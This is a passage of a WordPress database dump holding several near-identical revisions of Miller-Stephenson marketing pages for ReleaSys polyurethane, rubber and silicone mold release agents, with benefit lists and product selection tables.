center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 16:11:14', '2016-11-04 16:11:14', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2882, 0, '2016-11-04 16:16:51', '2016-11-04 16:16:51', '', '', '', 'publish', 'closed', 'closed', '', '2882', '', '', '2016-11-04 16:16:51', '2016-11-04 16:16:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/2882/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2883, 3, '2016-11-04 16:18:33', '2016-11-04 16:18:33', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong>Application Guide for Polyurethane Mold Release Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 16:18:33', '2016-11-04 16:18:33', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2884, 3, '2016-11-04 16:24:15', '2016-11-04 16:24:15', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong>Application Guide for Polyurethane Mold Release Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a>\r\n\r\n<a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a>\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 16:24:15', '2016-11-04 16:24:15', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2885, 3, '2016-11-04 16:50:32', '2016-11-04 16:50:32', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong>Application Guide for Polyurethane Mold Release Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a>\r\n\r\n<a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a>\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 16:50:32', '2016-11-04 16:50:32', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2886, 3, '2016-11-04 19:22:39', '2016-11-04 19:22:39', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1><strong>Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</strong></h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys™ Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys™ mold release products, include <strong>solvent based</strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide For Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 